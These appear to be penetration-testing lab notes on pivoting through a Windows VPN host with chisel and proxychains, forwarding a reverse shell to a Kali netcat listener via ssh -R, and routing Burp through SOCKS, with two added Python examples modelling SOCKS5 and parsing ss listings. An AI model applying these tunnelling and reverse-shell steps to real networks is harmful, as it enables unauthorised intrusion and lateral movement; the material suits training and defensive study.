Pivot in a Case

Scenario: the VPN to the target network only works from a Windows machine, but you want to attack from Kali Linux. The Windows machine becomes the pivot.

  1. Fire up the Windows machine and establish the VPN connection. Make sure you can reach the target machine from Windows.

  2. Set up a host-only network between the Windows machine and the Kali machine. Make sure the two can talk to each other.

  3. Upload chisel.exe to the Windows machine and install chisel on Kali.

  4. Start the chisel server on Kali (`--reverse` lets the client ask the server to open listeners on its side):

     ```
     chisel server -p 9090 --reverse
     ```

  5. Connect to the chisel server from the Windows machine and request a reverse SOCKS listener:

     ```
     .\chisel.exe client <ip kali machine>:9090 R:socks
     ```

  6. Point /etc/proxychains.conf at that SOCKS5 listener. chisel opens an `R:socks` listener on 127.0.0.1:1080 unless you give it another port (e.g. `R:<port>:socks`), so the entry needs the port:

     ```
     [ProxyList]
     socks5 127.0.0.1 1080
     ```

  7. Test the connection. Important: traffic leaving the tunnel carries the Windows machine's IP as its source, and a SOCKS proxy only relays TCP (and UDP) streams, so you cannot ping through it: the ICMP replies would never reach Kali. With nmap, always use -Pn so it skips host discovery and goes straight to the port scan:

     ```
     proxychains nmap -Pn <target machine behind the windows machine>
     ```
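To see why step 7 behaves the way it does, here is an added example (not code from these notes, from chisel or from proxychains) that encodes and decodes both halves of a SOCKS5 CONNECT exchange (RFC 1928) in memory: the client half that proxychains performs on behalf of nmap, and the proxy half that chisel performs. The pivot and target addresses in it are constructed placeholders. It makes two things concrete: the protocol only defines CONNECT, BIND and UDP ASSOCIATE, so an ICMP echo cannot be expressed through the tunnel at all (hence no ping, hence -Pn), and the BND.ADDR in the reply, modelled here as the pivot's egress address, is the source the target sees rather than the Kali machine.

```python
"""SOCKS5 (RFC 1928) CONNECT exchange, client and proxy side, kept in memory so
it runs offline. Added example for these notes; it models the messages that
proxychains and chisel exchange, it is not their code. All addresses constructed."""
import ipaddress
import struct

VER = 0x05
METHOD_NO_AUTH, METHOD_NONE_ACCEPTABLE = 0x00, 0xFF
# The only three commands RFC 1928 defines. Each sets up a TCP (or UDP) relay;
# there is no command that could carry an ICMP echo, which is why a ping scan
# through the tunnel cannot work and nmap needs -Pn.
CMD_CONNECT, CMD_BIND, CMD_UDP_ASSOCIATE = 0x01, 0x02, 0x03
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED, REP_CMD_NOT_SUPPORTED, REP_ATYP_NOT_SUPPORTED = 0x00, 0x07, 0x08


def encode_addr(host: str) -> bytes:
    """ATYP + address in wire form; hostnames go as-is so the proxy resolves them."""
    try:
        ip = ipaddress.ip_address(host)
        return bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    except ValueError:
        raw = host.encode("idna")
        return bytes([ATYP_DOMAIN, len(raw)]) + raw


def decode_addr(buf: bytes, off: int):
    """Return (host, port, next_offset) for the ATYP/ADDR/PORT fields at buf[off]."""
    atyp = buf[off]
    off += 1
    if atyp == ATYP_IPV4:
        host, off = str(ipaddress.IPv4Address(buf[off:off + 4])), off + 4
    elif atyp == ATYP_IPV6:
        host, off = str(ipaddress.IPv6Address(buf[off:off + 16])), off + 16
    elif atyp == ATYP_DOMAIN:
        n = buf[off]
        host, off = buf[off + 1:off + 1 + n].decode("idna"), off + 1 + n
    else:
        raise ValueError(f"unsupported ATYP {atyp:#x}")
    (port,) = struct.unpack("!H", buf[off:off + 2])
    return host, port, off + 2


# ---- client side: what proxychains does on behalf of the wrapped program ----
def client_greeting() -> bytes:
    return bytes([VER, 1, METHOD_NO_AUTH])          # VER NMETHODS METHODS


def client_connect(host: str, port: int) -> bytes:
    # VER CMD RSV ATYP DST.ADDR DST.PORT
    return bytes([VER, CMD_CONNECT, 0x00]) + encode_addr(host) + struct.pack("!H", port)


def parse_reply(buf: bytes) -> dict:
    if buf[0] != VER or buf[2] != 0x00:
        raise ValueError("malformed SOCKS5 reply")
    bnd_host, bnd_port, _ = decode_addr(buf, 3)
    return {"rep": buf[1], "bnd_host": bnd_host, "bnd_port": bnd_port}


# ---- proxy side: the chisel end that opens the real outbound TCP connection ----
def proxy_select_method(greeting: bytes) -> bytes:
    if greeting[0] != VER or len(greeting) != 2 + greeting[1]:
        raise ValueError("malformed greeting")
    chosen = METHOD_NO_AUTH if METHOD_NO_AUTH in greeting[2:] else METHOD_NONE_ACCEPTABLE
    return bytes([VER, chosen])


def proxy_handle_request(req: bytes, egress_ip: str, egress_port: int) -> bytes:
    """Build the reply. On success BND.ADDR/BND.PORT is the local end of the
    outbound socket the proxy opened, i.e. the pivot's own address: that is the
    source the target sees, not the operator's machine."""
    if req[0] != VER:
        raise ValueError("not SOCKS5")
    try:
        dst_host, dst_port, _ = decode_addr(req, 3)
    except ValueError:
        return bytes([VER, REP_ATYP_NOT_SUPPORTED, 0x00, ATYP_IPV4]) + b"\0" * 6
    if req[1] != CMD_CONNECT:                       # BIND/UDP ASSOCIATE not modelled here
        return bytes([VER, REP_CMD_NOT_SUPPORTED, 0x00, ATYP_IPV4]) + b"\0" * 6
    # A real proxy would socket.connect((dst_host, dst_port)) at this point.
    bnd = ipaddress.ip_address(egress_ip).packed
    return bytes([VER, REP_SUCCEEDED, 0x00, ATYP_IPV4]) + bnd + struct.pack("!H", egress_port)


def walk_connect(target_host, target_port, pivot_ip="198.51.100.7", pivot_port=49152):
    """Run both sides of the exchange in memory and return the parsed reply.
    pivot_ip stands in for the Windows machine's address (constructed)."""
    if proxy_select_method(client_greeting())[1] != METHOD_NO_AUTH:
        raise RuntimeError("proxy rejected our authentication methods")
    reply = proxy_handle_request(client_connect(target_host, target_port), pivot_ip, pivot_port)
    return parse_reply(reply)


if __name__ == "__main__":
    print(walk_connect("192.0.2.20", 80))           # IPv4 target, constructed
    print(walk_connect("intranet.example", 443))   # hostname resolved on the pivot side
```

The reply's `bnd_host` is what the wrapped tool would see as its own apparent endpoint; there is no field anywhere in the exchange through which Kali's address could reach the target.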

How to set up a reverse shell?

ref: https://www.youtube.com/watch?v=mOuqPROMmZc

The SOCKS tunnel only carries connections from Kali outwards, so for a reverse shell you need a second forward in the other direction: from the middle machine back to the Kali machine.

There are two options, depending on what the middle machine is. If it is a Linux machine with SSH, use a remote port forward:

```
ssh -R <middle machine IP>:<port>:127.0.0.1:<listen port> user_middle@<middle machine IP>
ssh -R <middle machine IP>:443:127.0.0.1:8080 user_middle@<middle machine IP>
```

Two things to check on the middle machine: sshd binds remote forwards to loopback only unless `GatewayPorts yes` or `GatewayPorts clientspecified` is set in sshd_config, so without it the listener on `<middle machine IP>:443` will not exist; and binding a port below 1024 such as 443 needs root, otherwise ssh reports that the remote port forwarding failed.

Your reverse shell connects to:

```
host: <middle machine IP>
port: 443
```

netcat listener on Kali:

```
nc -lvnp 8080
```
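After opening the forward, the quickest way to confirm it is bound where the reverse shell expects is `ss -tlnp` on the middle machine; the same listing is what an administrator of that host would use to spot tunnels that should not be there. Here is an added example (not part of these notes) that classifies the forward's scope from such a listing. Both listings in it are constructed, not captured from a real host, and 203.0.113.10 is a placeholder for the middle machine's IP.

```python
"""Classify where an `ssh -R` remote forward is listening on the middle machine
from the text of `ss -tlnp`. Added example for these notes; the listings are
constructed, not captured from a real host."""
import ipaddress
import re

# Constructed: sshd with GatewayPorts at its default ("no"). The forward for
# port 443 is bound to loopback only, so a reverse shell aimed at
# <middle machine IP>:443 is refused even though the ssh command "worked".
SS_LOOPBACK_ONLY = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       128     127.0.0.1:443        0.0.0.0:*          users:(("sshd",pid=2371,fd=9))
LISTEN  0       4096    127.0.0.53%lo:53     0.0.0.0:*          users:(("systemd-resolved",pid=600,fd=13))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""

# Constructed: same host with GatewayPorts clientspecified, after
# `ssh -R 203.0.113.10:443:127.0.0.1:8080 ...` (203.0.113.10 is a placeholder).
SS_GATEWAY = SS_LOOPBACK_ONLY.replace("127.0.0.1:443   ", "203.0.113.10:443")

LINE_RE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+users:\(\(\"(?P<proc>[^\"]+)\""
)


def parse_listeners(ss_text):
    """Return [{'addr', 'port', 'proc'}] for each LISTEN line. addr is normalised to
    a plain IP string (IPv6 brackets and the %interface suffix removed)."""
    listeners = []
    for line in ss_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                       # header, or a line without process info
        addr = m["addr"].strip("[]").split("%")[0]
        listeners.append({"addr": addr, "port": int(m["port"]), "proc": m["proc"]})
    return listeners


def forward_scope(ss_text, port, proc="sshd"):
    """'external' if proc listens on port on a non-loopback or wildcard address,
    'loopback' if only on 127.0.0.1/::1, 'absent' if it is not listening at all."""
    scopes = set()
    for l in parse_listeners(ss_text):
        if l["port"] != port or l["proc"] != proc:
            continue
        scopes.add("loopback" if ipaddress.ip_address(l["addr"]).is_loopback else "external")
    if "external" in scopes:
        return "external"
    return "loopback" if scopes else "absent"


def tunnel_listeners(ss_text, proc="sshd", service_port=22):
    """Every sshd listener that is not the SSH service port itself: on a jump host
    these are remote forwards someone has set up and deserve a second look."""
    return [l for l in parse_listeners(ss_text) if l["proc"] == proc and l["port"] != service_port]


if __name__ == "__main__":
    print("default sshd :", forward_scope(SS_LOOPBACK_ONLY, 443))
    print("GatewayPorts :", forward_scope(SS_GATEWAY, 443))
    print("forwards     :", tunnel_listeners(SS_GATEWAY))
```

If the result is `loopback`, the ssh command succeeded but the shell will never arrive; fix sshd's GatewayPorts setting on the middle machine rather than the ssh command line.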

How about setting up Burp Suite?

ref: https://www.youtube.com/watch?v=Q5ujOEXGOo8

Requirement: a tunnel with a SOCKS5 listener on 127.0.0.1 9666 (use chisel as above). Burp itself has to be told to send its outgoing requests through that SOCKS proxy (its SOCKS proxy setting under the network connection settings); the browser only ever talks to Burp.

  1. Set your browser proxy to the Burp proxy listener.

  2. Just let it go :D
